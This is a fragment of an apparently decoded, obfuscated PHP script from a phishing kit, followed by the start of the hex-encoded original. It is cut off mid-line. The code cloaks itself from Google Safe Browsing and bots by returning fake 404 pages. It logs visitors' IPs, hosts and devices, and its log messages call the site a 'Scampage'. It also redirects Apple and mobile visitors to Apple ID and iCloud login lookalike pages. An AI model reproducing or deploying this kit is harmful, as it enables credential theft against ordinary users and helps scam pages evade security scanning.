");fclose(${${"GLOBALS"}["mjtuckh"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Windows XP"and${${"GLOBALS"}["qiqzxvb"]}=="Internet Explorer"){${"GLOBALS"}["itbenbf"]="click";${"GLOBALS"}["hgiomns"]="file";$swklyjzs="click";${"GLOBALS"}["owbzhaqvo"]="file";${${"GLOBALS"}["hgiomns"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["owbzhaqvo"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["emnvrcgr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["itbenbf"]}=fopen("logs/total_bot.txt","a");fwrite(${$swklyjzs},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Windows XP"and${${"GLOBALS"}["owfqcfvicur"]}=="Chrome"){${"GLOBALS"}["tdvesohkxhzq"]="file";${${"GLOBALS"}["tdvesohkxhzq"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["emnvrcgr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Windows Vista"and${${"GLOBALS"}["qiqzxvb"]}=="Internet Explorer"){$dkwtgg="ip2";${"GLOBALS"}["clklelqyjjw"]="file";$ptpkrcgf="click";${"GLOBALS"}["cnegvwmufzpy"]="click";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");$wxmkllvhnxc="click";fwrite(${${"GLOBALS"}["clklelqyjjw"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$dkwtgg}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$ptpkrcgf}=fopen("logs/total_bot.txt","a");fwrite(${$wxmkllvhnxc},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["cnegvwmufzpy"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}${"GLOBALS"}["bjxgre"]="lock_country";if(${${"GLOBALS"}["wngmyj"]}=="Chrome OS"){$jwindzhev="file";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");$tsbxnxwuh="click";fwrite(${$jwindzhev}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["emnvrcgr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$tsbxnxwuh}=fopen("logs/total_bot.txt","a");${"GLOBALS"}["kytineeefcm"]="click";fwrite(${${"GLOBALS"}["kytineeefcm"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}$qenugsdveelo="setting";if(${${"GLOBALS"}["legzvualb"]}=="BlackBerry"){$wwdscrs="ip2";$hmfnxtuegfs="click";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$wwdscrs}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${$hmfnxtuegfs}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Linux"){${"GLOBALS"}["pludlhuktmg"]="ip2";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");${"GLOBALS"}["bxuejvblgrm"]="file";fwrite(${${"GLOBALS"}["bxuejvblgrm"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["pludlhuktmg"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");${"GLOBALS"}["vhrzoajjiqkk"]="click";fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["vhrzoajjiqkk"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["qiqzxvb"]}=="Unknown Browser"){${"GLOBALS"}["rnhgbmb"]="file";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");${"GLOBALS"}["gflfgqtp"]="ip2";fwrite(${${"GLOBALS"}["rnhgbmb"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["gflfgqtp"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${$lrudnkxtptj}=="Internet Explorer"){${"GLOBALS"}["nupfori"]="file";$vuvrim="ip2";${"GLOBALS"}["gwcggtgcumii"]="file";${${"GLOBALS"}["nupfori"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["gwcggtgcumii"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$vuvrim}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");$gmcernyur="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${$gmcernyur},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Windows 2000"){${"GLOBALS"}["ybrhokanewx"]="file";$khqaplwt="ip2";${"GLOBALS"}["cijkre"]="click";${${"GLOBALS"}["ybrhokanewx"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${$khqaplwt}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");$mivwld="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${$mivwld},"$ip2 (Google Safebrowsing)"."
");fclose(${${"GLOBALS"}["cijkre"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["wngmyj"]}=="Unknown OS Platform"){$nhxjtwjuta="click";${"GLOBALS"}["ybhhsxdupw"]="click";${"GLOBALS"}["pfojpnykfwr"]="ip2";${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${${"GLOBALS"}["rhyxsi"]}," BLOCKED GOOGLE SAFEBROWSING || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["pfojpnykfwr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ybhhsxdupw"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Google Safebrowsing)"."
");fclose(${$nhxjtwjuta});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${$qenugsdveelo}["lock_platform"]=="on"){$ftscyxqoucnv="os";$budbpoqr="os";if(${${"GLOBALS"}["wngmyj"]}=="iPhone"or${$ftscyxqoucnv}=="iPad"or${${"GLOBALS"}["wngmyj"]}=="iPod"or${$budbpoqr}=="Mac OS X"or${${"GLOBALS"}["wngmyj"]}=="Mac OS 9"){}else{${"GLOBALS"}["ikjkmbl"]="file";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/log_visitor.txt","a");${"GLOBALS"}["tijpqmlmxq"]="click";fwrite(${${"GLOBALS"}["tijpqmlmxq"]},"[$ip2 - $br - $os] Gagal Masuk Lock Platform"."
");$lhqciek="file";${"GLOBALS"}["xshrrqo"]="click";fclose(${${"GLOBALS"}["ykcskptxptor"]});${${"GLOBALS"}["ikjkmbl"]}=fopen("block_bot.txt","a");fwrite(${$lhqciek}," BLOCKED LOCK PLATFORM || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["rumyugklv"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");$tehvtdzwg="click";${${"GLOBALS"}["xshrrqo"]}=fopen("logs/total_bot.txt","a");fwrite(${$tehvtdzwg},"$ip2 (Lock Platform)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}}str_replace(${${"GLOBALS"}["vstjkn"]},"nemu",${${"GLOBALS"}["bjxgre"]},${${"GLOBALS"}["jmimgwxtrt"]});if(${$kccctorp}=="on"&&${${"GLOBALS"}["jmimgwxtrt"]}==0){$lgbqrjgw="click";$pjszwirl="click";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${$pjszwirl},"$ip - $ua (Detect Filter Lock Country"."
");fclose(${$lgbqrjgw});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}if(${${"GLOBALS"}["lxisjowdnr"]}["site_param_on"]=="on"){$wvuthrj="secret";${"GLOBALS"}["vgrvrlzeolm"]="password";$ehhnmrqrc="password";$itxojsggurkz="secret";${$wvuthrj}=${${"GLOBALS"}["lxisjowdnr"]}["site_parameter"];${${"GLOBALS"}["vgrvrlzeolm"]}=$_GET[${$itxojsggurkz}];if(!isset(${$ehhnmrqrc})){$yyvimpvvrvcb="file";${"GLOBALS"}["ewbrmeujuidn"]="jam";${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/log_visitor.txt","a");${${"GLOBALS"}["ewbrmeujuidn"]}=date("h:i:sa");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"[$jam - $ip2 - $cn - $br - $os] Ada bot (Gagal Masuk Site Parameter)"."
");$gxysis="click";fclose(${${"GLOBALS"}["ykcskptxptor"]});${${"GLOBALS"}["rhyxsi"]}=fopen("block_bot.txt","a");fwrite(${$yyvimpvvrvcb}," BLOCKED BOT INDEX || user-agent : ".$_SERVER["HTTP_USER_AGENT"]."
 ip : ".${${"GLOBALS"}["emnvrcgr"]}." || ".gmdate("Y-n-d")." ----> ".gmdate("H:i:s")."

");${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip2 (Bot Server)"."
");fclose(${$gxysis});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}else{${"GLOBALS"}["yoldgud"]="setting";${"GLOBALS"}["cjavchxxbt"]="click";${"GLOBALS"}["winutfei"]="jam";${"GLOBALS"}["mjubqe"]="ip2";$gcwnqnbyxj="status";$yvigrqed="click";${${"GLOBALS"}["fwucmuxpn"]}=substr(sha1(${${"GLOBALS"}["mjubqe"]}."pewkok"),0,15);${$yvigrqed}=fopen("logs/log_visitor.txt","a");${${"GLOBALS"}["winutfei"]}=date("h:i:sa");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"[$jam - $ip2 - $cn - $br - $os] Mengunjungi Scampage"."
");${"GLOBALS"}["vhephxnuhp"]="ip2";${"GLOBALS"}["ehgyidsvnhku"]="file";fclose(${${"GLOBALS"}["cjavchxxbt"]});${${"GLOBALS"}["chqntkd"]}=$_SERVER["HTTP_USER_AGENT"];${${"GLOBALS"}["ehgyidsvnhku"]}=fopen("ip.txt","a");$vcbithegdy="status";${${"GLOBALS"}["guxbyagqzm"]}=gethostbyaddr($_SERVER["REMOTE_ADDR"]);${"GLOBALS"}["buzjnpttxwsz"]="file";fwrite(${${"GLOBALS"}["buzjnpttxwsz"]},${${"GLOBALS"}["vhephxnuhp"]}."  -  $hostname ($ispnya) >> [$cn | $os | $br | $ua] 
");fclose(${${"GLOBALS"}["rhyxsi"]});${$vcbithegdy}=${${"GLOBALS"}["yoldgud"]}["error_code"];${"GLOBALS"}["lamxtgbko"]="setting";${"GLOBALS"}["jmixaesoqs"]="mobileall";${${"GLOBALS"}["gviurxwlvpm"]}=${${"GLOBALS"}["lxisjowdnr"]}["mobile_devices"];$_SESSION["status"]=${$gcwnqnbyxj};if(${${"GLOBALS"}["jmixaesoqs"]}=="on"){${"GLOBALS"}["rvmkdlbvpf"]="useragent";${${"GLOBALS"}["pbshxmsbpn"]}=$_SERVER["HTTP_USER_AGENT"];if(preg_match("/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|ipad|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i",${${"GLOBALS"}["pbshxmsbpn"]})||preg_match("/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i",substr(${${"GLOBALS"}["rvmkdlbvpf"]},0,4))){$xrhdsij="setting";$uruslowhpeqd="setting";if(${$xrhdsij}["theme"]=="apple"){$mbdqthdujj="key";echo"<script type='text/javascript'>window.top.location='session/?view=login&appIdKey=".${$mbdqthdujj}."&country=".${${"GLOBALS"}["vstjkn"]}."';</script>";}else if(${$uruslowhpeqd}["theme"]=="icloud"){$miilpbfhv="cid";echo"<script type='text/javascript'>window.top.location='session/?view=icloud&appIdKey=".${${"GLOBALS"}["fwucmuxpn"]}."&country=".${$miilpbfhv}."';</script>";}else{${"GLOBALS"}["rlyqgnq"]="cid";echo"<script type='text/javascript'>window.top.location='session/?view=classic&appIdKey=".${${"GLOBALS"}["fwucmuxpn"]}."&country=".${${"GLOBALS"}["rlyqgnq"]}."';</script>";}}else{$tjpsqlyrpl="click";${$tjpsqlyrpl}=fopen("logs/total_bot.txt","a");fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip - $ua (Detect by PC (Mobile Only Active)"."
");fclose(${${"GLOBALS"}["ykcskptxptor"]});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}}if(${${"GLOBALS"}["lamxtgbko"]}["theme"]=="apple"){${"GLOBALS"}["gkgrmtphaqtd"]="cid";echo"<script type='text/javascript'>window.top.location='session/?view=login&appIdKey=".${${"GLOBALS"}["fwucmuxpn"]}."&country=".${${"GLOBALS"}["gkgrmtphaqtd"]}."';</script>";}else if(${${"GLOBALS"}["lxisjowdnr"]}["theme"]=="icloud"){echo"<script type='text/javascript'>window.top.location='session/?view=icloud&appIdKey=".${${"GLOBALS"}["fwucmuxpn"]}."&country=".${${"GLOBALS"}["vstjkn"]}."';</script>";}else{${"GLOBALS"}["lumjycmu"]="cid";echo"<script type='text/javascript'>window.top.location='session/?view=classic&appIdKey=".${${"GLOBALS"}["fwucmuxpn"]}."&country=".${${"GLOBALS"}["lumjycmu"]}."';</script>";}}}else{${${"GLOBALS"}["ykcskptxptor"]}=fopen("logs/total_bot.txt","a");$sfquun="click";fwrite(${${"GLOBALS"}["ykcskptxptor"]},"$ip - $ua (Detect Without Parameter"."
");fclose(${$sfquun});header("HTTP/1.0 404 Not Found");die("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>");}} 
?>

Did this file decode correctly?

Original Code

<?php ${"\x47\x4c\x4f\x42AL\x53"}["\x70\x62\x73hxms\x62pn"]="\x75\x73e\x72a\x67\x65nt";${"\x47LO\x42\x41\x4c\x53"}["\x67v\x69\x75\x72\x78\x77\x6c\x76\x70\x6d"]="m\x6fb\x69l\x65\x61\x6c\x6c";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x75\x78\x62ya\x67\x71z\x6d"]="h\x6f\x73t\x6e\x61me";${"\x47\x4cO\x42\x41\x4c\x53"}["\x63\x68qnt\x6b\x64"]="\x75\x61";${"G\x4cOB\x41\x4c\x53"}["\x66\x77\x75\x63\x6d\x75\x78p\x6e"]="k\x65y";${"\x47\x4c\x4f\x42A\x4cS"}["j\x6dim\x67\x77\x78t\x72\x74"]="\x6e\x65\x6d\x75";${"\x47\x4cOB\x41\x4c\x53"}["\x76s\x74j\x6b\x6e"]="c\x69\x64";${"\x47L\x4fB\x41\x4cS"}["\x77\x6e\x67\x6d\x79\x6a"]="o\x73";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x65\x6d\x6e\x76r\x63g\x72"]="\x69\x70\x32";${"\x47\x4c\x4fBA\x4c\x53"}["\x76\x67\x69\x72\x63\x79p\x76t"]="\x62\x61\x6e\x6e\x65d_\x69\x73\x70";${"\x47L\x4fB\x41\x4c\x53"}["\x66\x78\x78\x63\x62\x6b\x6a\x77\x6fq"]="d\x65\x74a\x69ls";${"\x47LOB\x41L\x53"}["\x72i\x75\x78\x73\x65\x6c\x64"]="\x63\x6fn\x74\x65nt";${"\x47\x4c\x4f\x42\x41L\x53"}["l\x73\x66\x70\x6cw"]="\x67\x65\x74\x69p";${"\x47\x4cOB\x41\x4c\x53"}["\x67v\x6dm\x6f\x70j"]="c\x75rl";${"\x47\x4cO\x42AL\x53"}["q\x69\x71\x7a\x78v\x62"]="\x62r";${"G\x4cO\x42A\x4c\x53"}["\x64i\x78\x66ts"]="\x62ro\x77\x73\x65r\x5f\x61\x72\x72\x61\x79";${"\x47\x4c\x4f\x42AL\x53"}["\x64\x67\x77\x74\x65l\x61\x7a"]="\x62\x72o\x77s\x65\x72";${"GLO\x42\x41L\x53"}["\x69\x69\x79dy\x65d\x6a"]="\x76a\x6cu\x65";${"GL\x4f\x42\x41\x4cS"}["\x77\x6cpd\x6egyg\x77\x72d"]="u\x73\x65\x72\x5f\x61\x67\x65\x6e\x74";${"GL\x4f\x42\x41L\x53"}["v\x6e\x6c\x79\x73\x7axs\x6bs\x65\x6d"]="\x72\x65g\x65\x78";${"\x47\x4c\x4fB\x41\x4cS"}["ti\x74\x71\x6dl\x63v\x61"]="o\x73_p\x6ca\x74fo\x72m";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x72\x63e\x70\x6bd\x65\x74\x66\x6b"]="\x42ot\x54\x79\x70e";${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x66\x6b\x76c\x79f"]="\x42ot";${"\x47\x4cO\x42\x41\x4c\x53"}["\x74\x67\x61\x6f\x75\x6e\x6f\x64"]="\x64p";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6cv\x75\x6c\x69pk\x62"]="\x77o\x72d2";${"GL\x4f\x42A\x4c\x53"}["\x62irblob\x66\x6c"]="blo\x63\x6b\x65\x64\x5f\x77o\x72ds";${"\x47\x4cO\x42A\x4c\x53"}["izi\x6b\x6clqxp"]="\x69\x70\x73";${"\x47L\x4fB\x41LS"}["\x72fu\x6bd\x62b\x67\x78\x67"]="\x69d";${"\x47L\x4fB\x41\x4c\x53"}["\x6f\x63\x62\x7aogh"]="\x76_\x61\x67\x65nt";${"\x47L\x4f\x42A\x4c\x53"}["\x68\x6e\x79\x73\x68j\x65\x6f"]="b\x61\x6ene\x64\x49\x50";${"G\x4c\x4fB\x41L\x53"}["y\x6bc\x73\x6b\x70\x74\x78\x70\x74\x6f\x72"]="\x63\x6cick";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x68y\x78s\x69"]="f\x69le";${"G\x4cO\x42\x41\x4c\x53"}["\x72\x75\x6d\x79\x75gk\x6c\x76"]="\x69p";${"\x47LO\x42\x41\x4cS"}["o\x72pa\x79grlnp\x6f"]="w\x6fr\x64";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6b\x72k\x63\x66au"]="\x65\x72r\x6f\x72";${"\x47LOB\x41\x4cS"}["cw\x68\x79\x6dyr\x77"]="\x64o\x6d\x61i\x6e";${"\x47\x4cO\x42A\x4c\x53"}["l\x78\x69\x73\x6a\x6f\x77\x64nr"]="\x73\x65t\x74\x69\x6e\x67";${"G\x4c\x4fBALS"}["g\x6e\x6fc\x68\x73de\x67\x77"]="\x6c\x6f\x63\x6b_\x63\x6f\x75\x6e\x74ry";session_start();$flgmrzyqhsc="\x75a";$kwdwodjmu="ra\x6e\x64o\x6d_\x69d";${"\x47\x4c\x4fB\x41\x4cS"}["\x77\x62\x6bwe\x71u\x72p\x74\x67i"]="\x73\x65\x74\x74\x69\x6eg";error_reporting(0);date_default_timezone_set("\x41sia/Jakar\x74\x61");$rgnxqret="\x64o\x6dai\x6e";$wecrghtqv="\x73\x65\x74\x74\x69\x6e\x67";include"\x6d\x61i\x6e\x2e\x70hp";${$kwdwodjmu}=sha1(md5(rand(0,1000000)));$csuqxdee="\x73\x65\x74t\x69\x6e\x67";${$rgnxqret}=preg_replace("/w\x77\x77\x5c\x2e/i","",$_SERVER["SERVE\x52_N\x41\x4d\x45"]);${${"G\x4c\x4f\x42\x41L\x53"}["\x6c\x78\x69\x73j\x6f\x77d\x6e\x72"]}=get_setting(${${"\x47L\x4fBA\x4cS"}["\x63\x77hym\x79\x72w"]});${${"\x47L\x4f\x42A\x4cS"}["\x6brkcf\x61\x75"]}=${${"\x47\x4c\x4f\x42\x41LS"}["w\x62kw\x65\x71\x75\x72\x70\x74g\x69"]}["error_\x63\x6fd\x65"];${"\x47\x4cO\x42\x41\x4cS"}["e\x77\x74\x67\x6a\x66\x71\x77\x74\x72\x6f\x67"]="\x6co\x63\x6b_\x63ou\x6e\x74\x72y\x5fo\x6e";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x67\x6e\x6f\x63\x68sd\x65gw"]}=${$wecrghtqv}["\x6c\x6f\x63\x6b_c\x6fu\x6e\x74r\x79"];${${"\x47\x4c\x4f\x42\x41L\x53"}["e\x77t\x67\x6a\x66q\x77\x74ro\x67"]}=${$csuqxdee}["lo\x63\x6b_\x63\x6f\x75\x6et\x72\x79\x5f\x6fn"];${$flgmrzyqhsc}=$_SERVER["H\x54T\x50_\x55S\x45R\x5fA\x47EN\x54"];echo"<!--$random_id-->";if(${${"\x47\x4cO\x42A\x4cS"}["k\x72\x6b\x63f\x61\x75"]}==2){echo"D\x4f\x4dA\x49\x4e\x20\x4eO\x54\x20\x52E\